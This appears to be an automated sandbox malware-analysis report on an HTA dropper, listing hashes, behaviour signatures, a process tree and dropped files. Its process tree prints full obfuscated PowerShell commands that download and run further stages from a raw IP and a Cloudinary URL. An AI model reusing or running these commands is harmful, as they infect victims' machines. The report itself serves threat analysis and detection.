Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-12-2024 06:24
Behavioral task
behavioral1
Sample
seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta
Resource
win10v2004-20241007-en
General
-
Target
seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta
-
Size
144KB
-
MD5
80636733be5c6936770df78c2298d639
-
SHA1
0e9cd08975bff8b04e8e7671f13c2585c25796a5
-
SHA256
9c4e6335372584e7b1e145fe9ac1eeb43c148ac9b98337a4629b817badc83eec
-
SHA512
6518d2d47c9f724e9beeae9440ac82d379d51e8bd81970fe37b933f07e2ebe7e280c91c30202cf4c57776551ff2524d78bceb486a74a100472838d96500fa1a7
-
SSDEEP
768:t1EuT0um2oum2uD5KUJDVUKhCTGVf/ACBzg2lw1/lEwUUKBqe/zg7szgmUM/ONvT:tF
Malware Config
Extracted
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2572 powershell.exe 6 1448 powershell.exe 8 1448 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 2572 powershell.exe -
pid Process 1448 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2572 powershell.exe 1448 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2572 powershell.exe Token: SeDebugPrivilege 1448 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2708 wrote to memory of 2716 2708 mshta.exe 30 PID 2708 wrote to memory of 2716 2708 mshta.exe 30 PID 2708 wrote to memory of 2716 2708 mshta.exe 30 PID 2708 wrote to memory of 2716 2708 mshta.exe 30 PID 2716 wrote to memory of 2572 2716 cmd.exe 32 PID 2716 wrote to memory of 2572 2716 cmd.exe 32 PID 2716 wrote to memory of 2572 2716 cmd.exe 32 PID 2716 wrote to memory of 2572 2716 cmd.exe 32 PID 2572 wrote to memory of 2916 2572 powershell.exe 33 PID 2572 wrote to memory of 2916 2572 powershell.exe 33 PID 2572 wrote to memory of 2916 2572 powershell.exe 33 PID 2572 wrote to memory of 2916 2572 powershell.exe 33 PID 2916 wrote to memory of 2700 2916 csc.exe 34 PID 2916 wrote to memory of 2700 2916 csc.exe 34 PID 2916 wrote to memory of 2700 2916 csc.exe 34 PID 2916 wrote to memory of 2700 2916 csc.exe 34 PID 2572 wrote to memory of 3064 2572 powershell.exe 36 PID 2572 wrote to memory of 3064 2572 powershell.exe 36 PID 2572 wrote to memory of 3064 2572 powershell.exe 36 PID 2572 wrote to memory of 3064 2572 powershell.exe 36 PID 3064 wrote to memory of 1448 3064 WScript.exe 37 PID 3064 wrote to memory of 1448 3064 WScript.exe 37 PID 3064 wrote to memory of 1448 3064 WScript.exe 37 PID 3064 wrote to memory of 1448 3064 WScript.exe 37
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ry0s-0-q.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF4CB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF4CA.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2700
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1448
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5a0db05fc83cfdd6d203e1991b3f17de3
SHA1480ca0b090e2ceab8a56f5c2c1a66ffc08fb326f
SHA256a7b6bf183ae22d9c376f5635051b7129d721560e0d0c1c0ef21aca0179f6ac16
SHA5125c61b88775aa16742717307268f9b2d6ce4b1ea7ebb1733e3b1adc5028ac1979df7eaea03090987c4e525d34233b6b391f55256228514daa76c909b39ffc3047
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD549d906b48f19bf7dfb054f46a469ef41
SHA142fa6b5e80cf1936251ad224df888d647daf7500
SHA2561be01c72b01b91db896179fe7a55d9572c7dee9f5ed9c0e3c435c8b55902cd5e
SHA5121a2ef6d4070b40e174b473cf3ed7746570202368d9933107fb41864ba60c563ebd80b8d3572f087825887b4997ff9d264b101c85579231508fc5f87ceaefc27e
-
Filesize
7KB
MD5a57224e7e72554c51f68ed0d69bfed22
SHA1361ad5c4a569e3b7266e94c662f15a2e5efdeba5
SHA256d54762a6c1e73880c4138fac96903b40d91e236445d6021e46a64043a9bee87a
SHA512ac50f4c8161a5ef95afdb1ee03af0a83bbce253bb5bf2d3a859f41d176c3ebc87de641326a4d7392fc1cbfd7d20e9ddcd1034a8f97b8d703b88aeb238ba87088
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD50800a6dbd02a455244a8aff4b79796c6
SHA1ced6aba3ad61aedbaff0ed779c2a66387edf67ad
SHA25605954c88700cec325bcc58d07cf551ec4e4e887f844294438c93330d2afbdc62
SHA512c70871a7b2e0459e478c23152d82cea20a21a1757f11e264e7c90359793e4320bc2fdb3382ab63ae3b22a29feb79dfa2a9a021775e072e898d3bd472ab02d791
-
Filesize
150KB
MD580c468cccbc1d6aa31d066f64ce06b42
SHA16276da318e9ec1756dda7d7c9e9b2c5f00d3fda4
SHA25679a186bd409caf82e85361c6885fd71ee00bea6968d85cb8c9b71535909fe411
SHA51237fd56e6121926e15433636afe449f7002de7a5be35c18f8855d2e24c3542eabd7533b2ddb363e49972ddca03f3edb5868bb944ac799ff2fcf245d6271bf6662
-
Filesize
652B
MD5416332b5d9c57c857d78006490c95003
SHA1f7a1ef4ecac9be0cea60f075c5bb7f729d1143b5
SHA2560bba2b219964dcfc67ea0fca09abf2177607167234d0092c7113e9e59ba963bb
SHA5126adf0e0e8e3686f2246ca84d7dbdb0a5f0e368b95c7e613f6f643f8945209b835ddfaa0fda827b6a7c1979df293d0dbe5ccdb8dde76db858349334e438f46945
-
Filesize
485B
MD5c0ab7d9c1b9063dc8a229d9074412ec6
SHA14822b8b99901c563e7b2eb0399aab1ada29809d1
SHA25605da06f5d5afbb950c215d14a1ae166c256466f43298bf300ddffe6cf87d6ef6
SHA5123d09208b03cbbca2f036d4c7caf06990af60c40fd3727f59489c454e7d8d02a6f0ed1448040f224a093695dd143836044d5afdd8543c921a2f543246da57b4bf
-
Filesize
309B
MD5c8d89b35db18b35d427b31c6d5cc942f
SHA1fcfa6333ab93cbbae38144404fcef284dbfdcba3
SHA2566914d057c9acbc1b449cc330801602d12f945f02bdffad265396bfb894e235b6
SHA512a0930e406868bb91f1a7fbecb01f7f36dfde04d5ddc01c8f0b08a9e4a14cadbe4f6d6e47fc7d940de77711a0aec40eb365cde504e4a6cd704507d21d8ccb67b6